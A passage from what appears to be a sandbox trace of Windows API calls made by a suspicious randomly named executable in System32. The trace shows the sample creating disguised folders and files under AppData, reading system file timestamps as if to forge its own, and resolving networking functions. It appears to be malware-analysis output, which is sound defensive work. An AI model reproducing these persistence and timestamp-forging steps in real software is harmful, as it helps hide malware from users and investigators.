\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x20f3f4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x1c\x1eçô,÷ ", lpUsedDefaultChar=0x0) returned 256 [0034.156] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.156] GetLastError () returned 0x0 [0034.156] SetLastError (dwErrCode=0x0) [0034.156] GetLastError () returned 0x0 [0034.156] SetLastError (dwErrCode=0x0) [0034.156] GetLastError () returned 0x0 [0034.156] SetLastError (dwErrCode=0x0) [0034.156] GetLastError () returned 0x0 [0034.156] SetLastError (dwErrCode=0x0) [0034.156] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.157] SetLastError (dwErrCode=0x0) [0034.157] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.158] SetLastError (dwErrCode=0x0) [0034.158] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.159] SetLastError (dwErrCode=0x0) [0034.159] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.160] SetLastError (dwErrCode=0x0) [0034.160] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.161] GetLastError () returned 0x0 [0034.161] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.162] GetLastError () returned 0x0 [0034.162] SetLastError (dwErrCode=0x0) [0034.163] GetLastError () returned 0x0 [0034.163] SetLastError (dwErrCode=0x0) [0034.163] GetLastError () returned 0x0 [0034.163] SetLastError (dwErrCode=0x0) [0034.163] GetLastError () returned 0x0 [0034.163] SetLastError (dwErrCode=0x0) [0034.163] GetLastError () returned 0x0 [0034.163] SetLastError (dwErrCode=0x0) [0034.163] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.172] SetLastError (dwErrCode=0x0) [0034.172] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.173] GetLastError () returned 0x0 [0034.173] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.174] GetLastError () returned 0x0 [0034.174] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.175] GetLastError () returned 0x0 [0034.175] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.176] SetLastError (dwErrCode=0x0) [0034.176] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.177] SetLastError (dwErrCode=0x0) [0034.177] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.178] SetLastError (dwErrCode=0x0) [0034.178] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.179] SetLastError (dwErrCode=0x0) [0034.179] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.180] SetLastError (dwErrCode=0x0) [0034.180] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.181] SetLastError (dwErrCode=0x0) [0034.181] GetLastError () returned 0x0 [0034.182] SetLastError (dwErrCode=0x0) [0034.182] GetLastError () returned 0x0 [0034.182] SetLastError (dwErrCode=0x0) [0034.182] GetLastError () returned 0x0 [0034.182] SetLastError (dwErrCode=0x0) [0034.183] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.183] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.183] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.184] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f770 | out: lpSystemTimeAsFileTime=0x20f770*(dwLowDateTime=0xe20fed10, dwHighDateTime=0x1d3dfba)) [0034.184] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f6a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.184] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f590, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.184] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetLastError () returned 0x0 [0034.185] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.185] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.185] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.185] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.185] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.185] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.185] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.185] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.186] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.186] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.186] GetLastError () returned 0xb7 [0034.186] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.186] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.186] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.186] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.186] wsprintfA (in: param_1=0x20f410, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.186] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.186] wsprintfA (in: param_1=0x20f30c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.186] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.186] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.186] CloseHandle (hObject=0x74) returned 1 [0034.186] GetLastError () returned 0x0 [0034.186] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.186] GetLastError () returned 0x0 [0034.186] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.187] GetSystemDirectoryA (in: lpBuffer=0x20f410, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.187] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.187] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.187] CloseHandle (hObject=0x74) returned 1 [0034.187] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.187] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.187] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.189] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.189] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.189] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.189] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.189] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.189] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.189] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.189] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.190] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.190] GetProcAddress (hModule=0x761d0000, 